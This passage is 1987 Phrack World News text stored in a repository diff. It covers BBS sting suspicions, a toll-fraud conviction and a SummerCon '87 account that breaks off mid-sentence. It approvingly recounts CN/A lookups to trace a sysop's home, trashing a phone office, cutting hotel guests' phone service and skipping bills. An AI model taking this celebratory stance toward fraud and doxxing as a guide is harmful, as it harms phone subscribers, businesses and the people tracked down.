needs it. I'm easily reached via boards etc., and if it is that important to
|
||||
speak with me voice, loops and bridges do exist. It may be more convenient
|
||||
for you to have my voice number, but I don't think its really worth the risk.
|
||||
Face it, security people are getting serious about tracking people down.
|
||||
|
||||
Unless you move around the country on a monthly basis, you might as well
|
||||
retire when your phone number gets 'out'. This is not to say everyone whose
|
||||
number isn't secure is due to be busted but consider the following:
|
||||
|
||||
If I have your phone number I also have:
|
||||
|
||||
1) Your full name
|
||||
2) Age
|
||||
3) Address
|
||||
4) Criminal record (its public knowledge)
|
||||
|
||||
As well as just about anything else that comes to mind. If I can do that,
|
||||
just think what an investigator can do. As far as Psychic Warlord's policy of
|
||||
no number, no access goes, well I think it sucks. Anyone here remember "The
|
||||
Board" in 313? [See Phrack World News Issues 7-1 and 9-1 for information
|
||||
concerning "THE BOARD" and its aftermath.]
|
||||
|
||||
I don't know much about Psychic Warlord and he doesn't need to know much about
|
||||
me. Its his system, and he can do what he likes with it, but I hope this
|
||||
isn't the wave of the future. Its a good policy not to leave phone numbers
|
||||
when calling boards for the first time, and after that, you'll have to use
|
||||
common sense. That is what it all comes down to, common sense. It seems to
|
||||
be in short supply these days.
|
||||
|
||||
Post Taken From Metal Shop Private
|
||||
______________________________________________________________________________
|
||||
|
||||
Metalland South: Phreak BBS or MetalliFEDS Inc.? June 2, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Metalland South BBS, at 404-327-2327, was once a fairly well known bulletin
|
||||
board, where many respected members of the hack/phreak community resided. It
|
||||
was originally operated by two guys from Metal Communications, Inc., but it
|
||||
wasn't an MCI club board. The sysop was Iron Man and the co-sysop was Black
|
||||
Lord. Recently, it has come to the writer's attention, that MS has come under
|
||||
new management, new policies, and possibly a new idea; Sting.
|
||||
|
||||
Somewhere around September-October 1986, Iron Man removed all of the hack/
|
||||
phreak related subboards as well as all G-philes from the system. He was
|
||||
apparently worried about getting busted. The last time this reporter spoke
|
||||
with him, Iron Man said he intended to put the hack/phreak subs back up. Then,
|
||||
not long after this conversation, the number was changed (The original number
|
||||
was 404-576-5166).
|
||||
|
||||
A person using the alias of The Caretaker was made co-sysop and Iron Man would
|
||||
not reply to feedback. Everything was handled by The Caretaker [TC from now
|
||||
on]. TC did not allow any hack/phreak subs, but said he would put them up if
|
||||
the users would follow STRICT validation procedures.
|
||||
|
||||
Strict validation on MS includes:
|
||||
|
||||
^*^ Your Real Name
|
||||
^*^ Your Address
|
||||
^*^ Your Voice Phone Number
|
||||
^*^ A Self-Addressed Envelope (in which he will send back with your account
|
||||
number and password.)
|
||||
|
||||
It is obvious to see the ramifications here. A board or sysop gets busted and
|
||||
then makes a deal to turn over the board to some company or agency. To make
|
||||
sure that they get who they want, you have to give them all this info, and the
|
||||
only you can get a password is to let them mail it to you, thus guaranteeing
|
||||
that if something illegal is posted under that account, you are responsible,
|
||||
no ifs, ands, or buts.
|
||||
|
||||
Now, with the always helpful use of CN/A and various other special procedures,
|
||||
this reporter and several others have contacted the home of The Caretaker. TC
|
||||
will not admit to being or to not being The Caretaker. He says he "may be."
|
||||
Also, while speaking with to Taran King, TC tried to engineer Taran's phone
|
||||
number three times, using trickery like "let's be friends, what is your phone
|
||||
number?" TK gave the guy the MSP number, figuring everyone has it. Also TC
|
||||
is older than 18 (estimated at age 30), and he has three phone lines in his
|
||||
house. When called, he will not admit to who he is, who runs MS, or who is
|
||||
the sysop of it. Also, besides begging for you phone number (or demanding he
|
||||
call you). TC tries to trap you into admitting that you are/have committed
|
||||
toll fraud. In TK's case, TC tried to get Taran to admit to using other
|
||||
person's LD service PINs.
|
||||
|
||||
The whole aura of mystery around Metalland South seems enough to make it not
|
||||
worth calling. I urge you never to call this system and never send in
|
||||
information like that to any system.
|
||||
|
||||
Recently I have spoken with Iron Man, and he says "I gave the board to some
|
||||
guy cause I was sick of running it." Well, he is lying as you will see in the
|
||||
following transcript:
|
||||
|
||||
ME: So, gave it away. To who?
|
||||
IM: I really don't know him that well. I can give you his first name.
|
||||
ME: No, that is okay. How old is he?
|
||||
IM: I don't know. We only talked once and I sent him the software.
|
||||
ME: Is his name XXXXX, XXXXX (TC's real name)?
|
||||
IM: I really don't know.
|
||||
ME: So why did you give the board to someone you don't know?
|
||||
IM: That was the only chance of keeping it up.
|
||||
|
||||
Now, IM do you know him or not? Do you just go throwing the board around? I
|
||||
thought you said you knew his first name?
|
||||
|
||||
^*^ How the heck could he send him the software and not know his name?
|
||||
(Yeah, I suppose he AE'd a 30 sub system. I can see it now, "To whom
|
||||
these disks concern."
|
||||
|
||||
^*^ Didn't IM seem to know much too little about The Caretaker? I could
|
||||
understand him not having the guy's last name or address, but not even
|
||||
knowing his age or where he lives..?
|
||||
|
||||
Here are some other things to think about. There is an entire subboard
|
||||
dedicated to law enforcement and the local police even have an account on the
|
||||
system under the name CRIMESTOPPERS. I wonder what they would have to say
|
||||
about codes on the bulletin board. Keep in mind that Metalland South has no
|
||||
affiliation with Metallibashers, Inc. or Metal Communications, Inc.
|
||||
|
||||
Please do not harass the board or its sysop(s), for it serves no purpose. Now
|
||||
understand that this article is not definitely stating that this board is
|
||||
directly connected to any law enforcement agency, you can decide this for
|
||||
yourself.
|
||||
|
||||
Article Written By >UNKNOWN USER<
|
||||
(An Anonymous Phrack Field Reporter)
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
Editorial Comments...
|
||||
~~~~~~~~~~~~~~~~~~~~~
|
||||
I just wanted to make a few comments about the above article. >UNKNOWN USER<
|
||||
is the official handle that shall be used by anyone supplying an article, but
|
||||
wishes for his name not to be mentioned. Its symbolic of the "anonymous user"
|
||||
function on Metal Shop Private, but it has no direct connection.
|
||||
|
||||
We, the editors of Phrack, do not necessarily agree with any of the above
|
||||
statements and we do encourage those with opposite viewpoints to voice them.
|
||||
PWN can be used as the forum for those viewpoints, in which I shall voice no
|
||||
opinion. One more thing, for the record, I did edit the article (with the
|
||||
author's consent) and will continue to do so to ensure that the original
|
||||
author's style will not revel their identity.
|
||||
|
||||
:Knight Lightning
|
||||
______________________________________________________________________________
|
||||
|
||||
Toll Fraud Trial Sets New Tone June 5, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
>From Network World
|
||||
by Josh Gonze (Staff Writer)
|
||||
|
||||
"May be first jury finding for abuse"
|
||||
|
||||
Dallas - The recent jury conviction of a Texas man for the theft and sale of
|
||||
long-distance access codes may make it easier for long-haul carriers to stem
|
||||
the tide of toll fraud, which costs the industry an estimated 500 million
|
||||
dollars a year.
|
||||
|
||||
On May 11, 1987, a U.S. District Court jury here [in Dallas] found Dallas
|
||||
resident Jack Brewer guilty on two counts each of trafficking and possession
|
||||
of telephone access codes stolen from Texas National Telecommunications Inc.
|
||||
(TNT), a Texas long-distance carrier. Brewer was charged under a section of
|
||||
the federal COMPREHENSIVE CRIME CONTROL ACT of 1984.
|
||||
|
||||
Sources close to the case said Brewer may be the first person to be convicted
|
||||
by a jury for toll fraud in the United States. The case is also seen as
|
||||
important because it indicates growing recognition of toll fraud as a serious
|
||||
crime.
|
||||
|
||||
Brewer was selling the stolen codes, which telephone callers use to access
|
||||
long-distance circuits of carriers other than AT&T and which those carriers
|
||||
use for billing, says Terry K. Ray, the Assistant U.S. Attorney who prosecuted
|
||||
Brewer. TNT officials said use of the stolen codes cost the company $30,000.
|
||||
Ray said he met with representatives of MCI Communications Corp. last week to
|
||||
discuss the investigative techniques used to apprehend Brewer and legal
|
||||
methods used to win the conviction. Brewer will be sentenced by a judge on
|
||||
June 4 [Yeah the story is a little old, so what], and faces a maximum sentence
|
||||
of 50 years imprisonment and a $1 million fine.
|
||||
|
||||
Toll fraud places a heavy financial burden on MCI and other carriers. Neither
|
||||
MCI or AT&T would divulge what toll fraud costs them, but U.S. Sprint
|
||||
Communications Co. said fraudulent use of access codes lowered its
|
||||
first-quarter 1987 revenue by $19 million.
|
||||
|
||||
Brewer was apprehended through a sting operation conducted with the help of
|
||||
TNT, Southwestern Bell Corp., and the U.S. Secret Service. Southwestern Bell
|
||||
monitored Brewer's private telephone as he dialed numbers sequentially in a
|
||||
trial-and-error attempt to obtain active access numbers. The Regional Bell
|
||||
Holding Company kept a list of the working access codes obtained by Brewer.
|
||||
Secret Service agents then contacted Brewer, posing as buyers of access
|
||||
numbers. For $3,000, Brewer sold them a list of 15 numbers, which matched the
|
||||
list, made by the RBC [Just a tad greedy wasn't he?].
|
||||
|
||||
MCI has joined with AT&T, U.S. Sprint and some smaller carriers to form the
|
||||
Communications Fraud Control Association (CFCA). Rami Abuhamdeh, executive
|
||||
director of Tysons Corner, a Virginia based group, said there have been
|
||||
several convictions for toll fraud to date, but those cases were decided by
|
||||
judges, not juries.
|
||||
|
||||
A number of federal and state statues apply in stolen code cases, depending on
|
||||
how and when the offender defrauds the carrier, Abuhamdeh said. Gaston Sigur,
|
||||
a lawyer for exchanges, they will faze out code numbers as a way of accessing
|
||||
long-distance circuits and the level of toll fraud will decline.
|
||||
|
||||
Thanks to Jester Sluggo
|
||||
Typed for PWN by Knight Lightning
|
||||
______________________________________________________________________________
|
||||
|
||||
PWN Quicknotes
|
||||
~~~~~~~~~~~~~~
|
||||
A guy who was involved in the California area phreak/pirate organization,
|
||||
known as The Duplicator, was reported as being killed in a plane crash.
|
||||
Info by Sir Francis Drake (3/31/87)
|
||||
------------------------------------------------------------------------------
|
||||
Doc Holiday was busted for hacking a COSMOS system that was local to him.
|
||||
Apparently, he dialed direct and the CO most likely had CLID. (4/2/87)
|
||||
------------------------------------------------------------------------------
|
||||
KEN is working on version 3.0 of Forum-PC, and there are rumors that it may be
|
||||
public domain.
|
||||
------------------------------------------------------------------------------
|
||||
The Broadway Show BBS, once known as The Radio Station, will be returning to
|
||||
the 212 NPA. Please contact Broadway Hacker for details.
|
||||
Information From Broadway Hacker (4/16/87)
|
||||
------------------------------------------------------------------------------
|
||||
The rumor going around on Pirate-80 (P-80) that The Lineman is a fed should be
|
||||
disregarded as The Lineman in question lives in the western part of the nation
|
||||
and not the famous sysop of Atlantis. Information From The Lineman (4/20/87)
|
||||
------------------------------------------------------------------------------
|
||||
Special Notice: As of Phrack XVI, Lucifer 666 will become the author of
|
||||
Phrack World News. Please send any news, stories or articles to him. I will
|
||||
be mildly active, but only for special reports or editing.
|
||||
|
||||
Knight Lightning - June 5, 1987
|
||||
______________________________________________________________________________
|
430
phrack14/9.txt
Normal file
430
phrack14/9.txt
Normal file
|
@ -0,0 +1,430 @@
|
|||
PWN ^*^ PWN ^*^ PWN { SummerCon '87 } PWN ^*^ PWN ^*^ PWN
|
||||
^*^ ^*^
|
||||
PWN Phrack World News PWN
|
||||
^*^ Issue XIV/2 ^*^
|
||||
PWN PWN
|
||||
^*^ "SummerCon Strikes" ^*^
|
||||
PWN PWN
|
||||
^*^ Created, Written, and Edited ^*^
|
||||
PWN by Knight Lightning PWN
|
||||
^*^ ^*^
|
||||
PWN ^*^ PWN ^*^ PWN { SummerCon '87 } PWN ^*^ PWN ^*^ PWN
|
||||
|
||||
Welcome to Phrack World News Issue XIV/2. This issue features the exclusive
|
||||
coverage of SummerCon '87, which took place in St. Louis, Missouri during the
|
||||
weekend of June 19-21, 1987. Before we get to the bulk of the issue I'd like
|
||||
to make a note that most of the people who originally claimed that they would
|
||||
attend did not show up, but this didn't stop us from having a great time. -KL
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
PreCon'87; Tuc Sunday, June 14, 1987
|
||||
~~~~~~~~~~~~~~
|
||||
It all started Sunday with the arrival of Tuc from New York. He checked in at
|
||||
the Executive International Best Western and then later went to visit the
|
||||
Volkswagon Car exhibit that was currently appearing in St. Louis at the
|
||||
National Museum Of Transportation.
|
||||
|
||||
Taran King and Knight Lightning went to meet Tuc at the hotel unaware that he
|
||||
had not yet returned from his visit. In the meantime they contacted several
|
||||
other associates to learn more about other guest's plans of arrival.
|
||||
|
||||
Sometime later, Tuc returned to the hotel and fell for a trick pulled by
|
||||
Knight Lightning and opened the door to his room. From here, PreCon'87 began
|
||||
and before too long Forest Ranger joined KL and TK. After some more
|
||||
greetings, Tuc unveiled some of his surprises including a few of his business
|
||||
cards.
|
||||
|
||||
The gathering broke up for a few hours and then regrouped (with the addition
|
||||
of Cheap Shades) back at the hotel. From there, Forest Ranger led the rest of
|
||||
us on a trek into Illinois (where they sell alcohol on Sundays). We finally
|
||||
reached a place called "Fast Eddie's," which served not only as a liquor
|
||||
store, but as a bar and whorehouse as well. Tuc and FR made their purchase
|
||||
and the party left for the hotel.
|
||||
|
||||
Things remained pretty calm for a while, as we contented ourselves with the
|
||||
consumption of alcoholic beverages. However, as the night lingered on, we
|
||||
became restless and loud. It wasn't long until lawn furniture started to
|
||||
disappear from the hotel's pool patio and this is when we received our first
|
||||
call from the hotel desk. Soon afterwards, we decided that is was time to eat
|
||||
and so we sent out for pizza.
|
||||
|
||||
Now, although we tried to keep the noise level down, apparently there were
|
||||
still complaints about us. About 27 minutes after we ordered the pizza, we
|
||||
received a visit from FR's sister-in-law who brought us a warning. "Get the
|
||||
hell out of here, the police are on their way!" That's all we needed to hear.
|
||||
Beer cans were grabbed and we were running for the door, when the hotel
|
||||
manager and security arrived. We explained that we were leaving and ran down
|
||||
the hallway. All of the sudden, the Domino's Pizza deliver man shows up. FR
|
||||
yelled, "Yo, Domino's dude. If you want to get paid, come down here!" There
|
||||
was no reaction. "Hey, you can deliver it to us here now or to jail, and then
|
||||
you won't get a tip." He finally got the point.
|
||||
|
||||
We grabbed the pizza and headed for a field north of Lambert Field (St. Louis
|
||||
International Airport). The place was known as the PVA (Private Viewing
|
||||
Area), but FR informed us that it was really a PFA (Private Fucking Area) as
|
||||
we noticed when we arrived. However, we were content with eating our pizza
|
||||
and drinking what was left of the beer. The hotel tried to get Tuc to pay for
|
||||
the room next door to his because the occupant complained that he didn't get
|
||||
any sleep. Tuc refused and checked out of the Best Western.
|
||||
______________________________________________________________________________
|
||||
|
||||
PreCon'87; The Omni International Hotel Thursday, June 18, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
This event was hardly as eventful as the previous one, but at least I can fill
|
||||
in a few blank days. Monday, June 15, 1987, we all saw the movie "The Witches
|
||||
of Eastwick" and visited North West Plaza. Tuesday, June 16, 1987, I don't
|
||||
know about because I wasn't there. Wednesday, June 17, 1987, KL, TK, and Tuc
|
||||
visited Union Station (a luxurious shopping mall) and Tuc picked up souvenirs
|
||||
for friends back home.
|
||||
|
||||
On Thursday we had several guests arrive. Dan The Operator (a real geek)
|
||||
arrived the earliest and Lucifer 666 and Synthetic Slug arrived a little later
|
||||
(together). Excluding Cheap Shades at the time, we all converged at Taran's
|
||||
house where the excited crowd wanted to see Metal Shop Private. Sadly though,
|
||||
a disassembled shell was all that remained. It wasn't long before we became
|
||||
bored and left for the hotel. L666 and SS got a room and we killed the rest
|
||||
of the afternoon at North West Plaza. Afterwards we began to party it up in
|
||||
the room while watching TV.
|
||||
|
||||
Some hours later, we received a call from Bill From RNOC, who was traveling
|
||||
with Ninja NYC. They were at The Omni International Hotel, downtown and
|
||||
adjoining to Union Station. The Omni is one the most expensive hotels in the
|
||||
city and we were all anxious to see it. KL, TK, Dan The Operator, and Tuc
|
||||
left to go visit Bill and Ninja.
|
||||
|
||||
After some misadventures in downtown St. Louis, we arrived at The Omni, which
|
||||
was a pretty secure building. The elevators required a room key to be
|
||||
operated. It seems kinda silly though when you consider that the stairs
|
||||
didn't. So up we went to the third floor where Bill and Ninja were actually
|
||||
staying.
|
||||
|
||||
The rooms at The Omni aren't a whole lot bigger than at Best Western, but they
|
||||
are quite a bit nicer. They have a TV and a phone in the bathroom. The main
|
||||
TV is remote control and gives you a billing readout on channel 3. It was
|
||||
different.
|
||||
|
||||
Bill came well prepared for the Con, he had stacks of old and new issues of
|
||||
2600 Magazine and other propaganda and material. He had several other
|
||||
interesting items as well including his mysterious notebooks that never left
|
||||
his sight. However, the most intriguing item that he had with him was his
|
||||
"bible." "Engineering and Operations in the Bell System" published by AT&T
|
||||
Bell Laboratories. You can guess what was inside.
|
||||
|
||||
So we all talked for a while and then said our goodbyes. The rest of the
|
||||
evening was for the most part uneventful for us, however, back at Best
|
||||
Western, Forest Ranger was lighting everything on fire and L666 attempted
|
||||
(unsuccessfully) to breath fire. I guess he wanted to live up to his name.
|
||||
SummerCon '87 was about to begin.
|
||||
______________________________________________________________________________
|
||||
|
||||
SummerCon '87; The Beginning Friday Morning, June 19, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
This was the day we had been waiting for. Dan The Operator had shared a room
|
||||
with Tuc (and he still hasn't paid his share) and Bill From RNOC and Ninja NYC
|
||||
got a room at the Best Western. Everyone soon gathered in Bill's room and
|
||||
decided to order pizza.
|
||||
|
||||
So we called Pizza Hut, which was just down the road and Bill was very
|
||||
surprised to discover that they did not have "BIG Igloo Jugs." After
|
||||
harassing the lady on the phone for a while, Tuc, TK, KL, Shades, and Dan left
|
||||
to go pick up the pizza. We didn't know Dan was taping us, but that story
|
||||
will be told later. We messed around at Pizza Hut for a while and then headed
|
||||
back to the hotel. On the way we had a drag race with some guy who thought he
|
||||
had a cool car, we won.
|
||||
|
||||
It wasn't much longer until Sir Francis Drake arrived bearing surprises. With
|
||||
him was Dr. Strangelamb (named for Dr. Stranglove, who wasn't too happy about
|
||||
it), a small stuffed black sheep that makes a "baa" sound when turned over.
|
||||
Lucifer 666 had a lot of fun at the Con playing with it. SFD also had several
|
||||
pictures of Oryan QUEST, his car, and Aiken Drum. As far as QUEST's pictures
|
||||
go, well lets just say that The Executioner's file in Phrack 13 was totally
|
||||
correct.
|
||||
|
||||
While back at the hotel, we had some problems with the management. They
|
||||
didn't appreciate our attempts at putting up signs in the lobby for SummerCon
|
||||
people. We worked something out, but on a nearby payphone was perhaps the
|
||||
strangest person we encountered the whole weekend. It was some weird lady who
|
||||
barked and scream and kicked the wall, while on the phone. FR was on the
|
||||
phone next to her and she screamed the word "COCKSUCKER!" He looked at her
|
||||
and she said "My son-in-law, what an asshole." FR's response was, "Uh yeah, I
|
||||
think I know some people like that."
|
||||
|
||||
We relaxed for a while back in Bill's room (We couldn't stand to stay in
|
||||
L666's room because of the lingering smell of Synthetic Slug's shoes). As we
|
||||
became bored, things started to be taken apart. Like the TV, phone, and the
|
||||
internal speaker system in the room. Throughout all of this, Dan The Operator
|
||||
had been taping us, but again that will be explained later.
|
||||
______________________________________________________________________________
|
||||
|
||||
SummerCon '87; Lets Party! Friday Afternoon-Evening, June 19, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Lex Luthor and The Leftist arrived at St. Louis Center and called for further
|
||||
directions. After a long and tiring ordeal, they finally learned how to reach
|
||||
us. Unfortunately it was rush hour and it would take them some time. We
|
||||
killed an hour and before long they joined us at Best Western.
|
||||
|
||||
After introductions were made, Tuc called Lex out into the hall, and then they
|
||||
in turn called me, Taran King, and Bill From RNOC as well. The topic of
|
||||
discussion was Dan The Operator who had hinted earlier that he was going to
|
||||
get a picture of Lex Luthor, without his knowledge. Less than 3 minutes
|
||||
later, Ninja NYC followed by Dan The Operator (tape recorder on) sneaked out
|
||||
the window and tried to reenter the hallway undetected. Ninja had no way of
|
||||
knowing what we were discussing and thus allowed Dan to come with. Suddenly
|
||||
we all started to run towards Dan with the intention of beating the hell out
|
||||
of him. However, he sneaked back into the room through the window.
|
||||
|
||||
Once the excitement was over we headed out to dinner. It was mostly
|
||||
uneventful, except for the conversations on the way. I don't know what went
|
||||
on in Tuc's car, but in mine we discussed Dan. We split into two groups, one
|
||||
went to Imo's (a pizza joint) and the rest of us (Bill From RNOC, Ninja NYC,
|
||||
Lex Luthor, Tuc, The Leftist, and myself) went to a regular sit-down
|
||||
restaurant. We discussed all sorts of different things both phreak and
|
||||
non-phreak related, but again the main topic was Dan.
|
||||
|
||||
Soon we were joined by the others and we left to go back to Best Western where
|
||||
we found The Disk Jockey, LOKI, and Control C. These guys came extremely well
|
||||
prepared. They rented a station wagon somewhere in Michigan and filed it with
|
||||
a cooler (you can guess what was inside that), tons of magazines, manuals,
|
||||
electrical equipment, a mobile phone transmitter/receiver, and Control C's IBM
|
||||
PC, hard disk drive, and modem.
|
||||
|
||||
After which, Phantom Phreaker, Doom Prophet, Data Line, Forest Ranger, Bit
|
||||
Master, and another friend of FR's showed up. SummerCon '87 had begun. It
|
||||
was just a big party from then on, with the regular hotel party actions. Data
|
||||
Line had brought lots of TeleComputist back issues to the TeleComputist room
|
||||
and was distributing them around.
|
||||
|
||||
At different times during the night, the elevators were jammed and several
|
||||
people at the Con decided to go up on the roof. However, many of them also
|
||||
decided to search for the hotel's PBX system. Somewhere along the way,
|
||||
Control C, The Leftist, Lucifer 666, Cheap Shades, and I found ourselves
|
||||
locked inside the staircase of the main building.
|
||||
|
||||
The doors only opened from the outside, except at the bottom. Unfortunately
|
||||
opening the door at the bottom would result in sounding the fire alarm in the
|
||||
building. This was bad news because that was the last thing we needed. Even
|
||||
if it wasn't our fault there would be complications. So the five of us split
|
||||
up and each took a door to bang on. The hotel was mostly empty in these
|
||||
areas, but I knew that there were people on floor ten. So Lucifer 666 and I
|
||||
ran up ten flights of stairs and pounded on the door until we finally got a
|
||||
response, several in fact and many of the people weren't happy (it was after
|
||||
11 PM). Before too long we had rounded up the rest of our crew and made it
|
||||
back to the rooms just in time to say good-bye to Phantom Phreaker and Doom
|
||||
Prophet who were leaving for home (they would return for the Con tomorrow).
|
||||
|
||||
Several more hours of partying commenced, as well as hourly pizza deliveries.
|
||||
Everyone was having a great time, however as the night dragged on, the concern
|
||||
regarding Dan The Operator and his camera (and other things) grew. He had
|
||||
been found already talking to John Maxfield once that night on the payphones
|
||||
and had been caught asking questions about several of the people at the Con.
|
||||
It wasn't long before the word "TeleTrial" began to be chanted by most of the
|
||||
Con-goers.
|
||||
|
||||
The interested parties gathered in the TeleComputist room and the
|
||||
interrogation began. Dan The Operator's explanations of events that evening
|
||||
had been proven false as they contradicted each other. The next step was to
|
||||
search his belongings. Forest Ranger led the prosecution and started through
|
||||
Dan's notebooks. In it was information about several of the people at the con
|
||||
and Taran King's and Forest Ranger's addresses (Dan had been to both their
|
||||
homes where he could have found the addresses). There were also phone numbers
|
||||
belonging to people that several Con-goers called. Obviously Dan had been
|
||||
keeping his eyes and ears open in order to gather information.
|
||||
|
||||
Dan became worried when FR wanted to search his suitcase and they stepped
|
||||
outside for a moment. For some reason Dan was worried about us seeing his
|
||||
dirty underwear. Now why would he become so frantic about dirty underwear
|
||||
unless there was something especially dirty about it. You can come to your
|
||||
own conclusions about this one. Anyway, Dan brought all sorts of electrical
|
||||
equipment with him, including welding equipment and light switches and things.
|
||||
The most hilarious item that he brought was Garfield the cat, a stuffed animal
|
||||
that he slept with.
|
||||
|
||||
The camera, tape recorder, film, and tapes were confiscated for later
|
||||
examining and being that is was around 4 AM, everyone decided to get some
|
||||
sleep.
|
||||
______________________________________________________________________________
|
||||
|
||||
SummerCon '87; Conference Time Saturday, June 20, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Taran King, Cheap Shades, and I arrived back at Best Western around 12 AM.
|
||||
Most of the other Con people were either still asleep or out for breakfast.
|
||||
By 12:45 almost everyone was back and we proceeded to the "Kitty Hawk Room."
|
||||
|
||||
Some of the clothing worn at the Con reflected the person's interests.
|
||||
|
||||
Bill From RNOC - Computer Hacker (pic)
|
||||
Lex Luthor - VAX/VMS Rules!
|
||||
Tuc - UNIX Bozo
|
||||
|
||||
The Con started off rather slow as no one really knew how to get it started.
|
||||
Finally Lex Luthor decided to discuss the current rumors about the BBS
|
||||
decline. From there the topics included;
|
||||
|
||||
Bulletin Boards
|
||||
Busts (Texas, Virginia, New York)
|
||||
Fiber Optics
|
||||
Automatic Number Identification (ANI)
|
||||
REMOBS
|
||||
Laws
|
||||
Handles
|
||||
Groups
|
||||
Broadway Hacker
|
||||
Methods of blowing 2600 Hertz
|
||||
SCCS
|
||||
4TELs
|
||||
800 CLID
|
||||
|
||||
Later, Bill From RNOC told some stories about his exploits and proceeded to
|
||||
draw diagrams of whatever came to mind. Phantom Phreaker and Doom Prophet
|
||||
were upset that no one wanted to discuss CAMA.
|
||||
|
||||
In the meantime, I noticed that Dan The Operator had disappeared. Forest
|
||||
Ranger and I investigated only to discover that the tapes had disappeared as
|
||||
well. We caught up with Dan later and discovered that the tapes were now in
|
||||
Control C's rented station wagon. LOKI let me in and I took the cassette I
|
||||
had been looking for and a roll of film. The tape had all of my SummerCon
|
||||
article memos on it and this article is partially the result. We didn't know
|
||||
about side B, but more on that later.
|
||||
|
||||
After the Con, Taran King, Control C, Lucifer 666, Bill From RNOC, and I
|
||||
headed out to my house where we had some serious copying to do. Control C
|
||||
brought his computer and we began to copy Metal Shop Private on to his hard
|
||||
disk drive. While this was going on, Lucifer was receiving a copy of my very
|
||||
own PWN software to aid him when he takes over with issue XVI. I left the
|
||||
cassette and film at my house, its a pity I didn't play it right away because
|
||||
this article would have had a very different end.
|
||||
|
||||
Anyway, we finished up and then headed to Chesterfield Mall, a nearby shopping
|
||||
center. From there we proceeded to the local CO and recovered some
|
||||
interesting artifacts. Our next stop was to pick up some hardware that we
|
||||
needed and then more trashing. We returned to Best Western and learned that
|
||||
Lex Luthor and The Leftist had left due to Leftist's tight schedule.
|
||||
|
||||
The rest of the afternoon was mostly uneventful. Lots of rain and not much to
|
||||
do. As night approached, the party part of the Con began to restart. Several
|
||||
of us got bored with this and decided to explore parts of the hotel. We found
|
||||
a Navy wedding reception and decided to take in the food. The management
|
||||
didn't approve and we were bounced. So then we decided to take a look at the
|
||||
telephone wiring boxes in the hallways of the buildings. The problem was that
|
||||
to open them you had to rip out part of the wall. Nevertheless, things have a
|
||||
way of happening and the residents of several wings of the hotel found
|
||||
themselves without phone service.
|
||||
|
||||
The management didn't like what was happening at all and called the police to
|
||||
investigate. They spotted several of us running around the hotel and it was a
|
||||
mad dash back to the rooms for cover. LOKI was spotted going through an open
|
||||
window into Lucifer 666's room and the police decided to investigate it more
|
||||
closely. After an hour of panic and excitement, things cooled down and most
|
||||
of the people in Lucifer 666's room either went to sleep or were playing with
|
||||
Control C's computer and logging on to Metal Shop Private.
|
||||
|
||||
We were bored and so Ninja NYC, Bill From RNOC, Taran King, Tuc, and I decided
|
||||
to go throw ice on Dan The Operator. We ran down the hall and banged on
|
||||
L666's door. Suddenly one of the hotel managers appeared and threatened us
|
||||
that if we didn't go to our rooms and keep quiet he would call the police. We
|
||||
left the hall and went to the back parking lot. Ninja started a wheel rolling
|
||||
towards the building and we all knew what the result would be <CRASH!>.
|
||||
|
||||
Before it hit we ran at full speed around to the front of the hotel where we
|
||||
were greeted by a hefty officer of the Bridgeton Police Department. He was
|
||||
sort of leaning on his car facing us. It was so eerie because it almost
|
||||
seemed as though he knew we were coming and was waiting for us. We slowed
|
||||
down considerably until he said, "Run to me boys." No one really reacted
|
||||
until he said it again, "C'mon run to me boys." Ten seconds later he was
|
||||
joined by the asshole manager that had yelled at us not more than 60 seconds
|
||||
ago. "How old are you!?" he asked checking for curfew violations. Our
|
||||
replies varied from 17 to 21. "Where are you from!?" Bill and Tuc replied
|
||||
New York, the rest of us kept quiet. "Lets see some room keys!" We showed
|
||||
him two keys and then he looked at the asshole manager and said, "They belong
|
||||
here." "Why are you outside, what are you doing!" Taran replied, "Going to
|
||||
get something to eat, is that okay mister!?"
|
||||
|
||||
Our car was parked next to his and we took off for a while. He tried to
|
||||
follow us, but we quickly left his jurisdiction. While we were out we found
|
||||
the home of Bigfoot (the truck). We messed around there for a while and then
|
||||
returned to Best Western and walked around some of the vacant floors of the
|
||||
hotel.
|
||||
|
||||
The only other interesting activity we did that evening was a 3 AM trip to a
|
||||
24 hour food store. Bill From RNOC, Taran King, Tuc, Sir Francis Drake, and I
|
||||
went to a Super Schnucks and messed around there. It was huge and we almost
|
||||
lost SFD. After making a few purchases, we went back to the home of Bigfoot
|
||||
and Taran decided to play bumper car with some of the super huge tires in the
|
||||
parking lot. We returned to the hotel for the last time and found Ninja NYC
|
||||
on the phone with L666's current girlfriend. We harassed her for a while and
|
||||
then I fell asleep. Taran and a few others made a few other trips around town
|
||||
and woke me up at about 6 AM Sunday morning.
|
||||
______________________________________________________________________________
|
||||
|
||||
SummerCon '87; Good-bye & Good Luck! Sunday, June 21, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Forest Ranger dropped by early to take Bill From RNOC and Ninja NYC to the
|
||||
train station, Taran King went along for the ride. It would be over 24 hours
|
||||
before they got home. Tuc took Dan The Operator to the airport around 7 AM
|
||||
and at about 8 AM Cheap Shades and I dropped off Sir Francis Drake who was on
|
||||
his way to Boston. I took Cheap Shades home and then went back to my house to
|
||||
crash out.
|
||||
|
||||
Forest Ranger went back to Best Western to find everyone in Bill's room. Bill
|
||||
and Ninja never checked out because of an excessively large phone bill that
|
||||
they didn't want to pay, so everyone took advantage of this situation and
|
||||
started to to order room service. Sometime later a bellboy appeared to
|
||||
collect the money due for the room service and everyone left leaving Forest
|
||||
Ranger behind. "Hey, I'll be right back, I left my wallet in my car, hold on
|
||||
a sec, okay?" FR never returned and everyone went home except for Tuc who was
|
||||
at another hotel (He took a room at Ben Franklin because he wasn't welcome at
|
||||
Best Western after what happened the Sunday previous).
|
||||
|
||||
Around 10 AM, I decided that I didn't feel like sleeping and started playing
|
||||
the tape only to find several unauthorized recordings. Dan had been taping us
|
||||
all throughout the Con, but the interesting parts came later. There was part
|
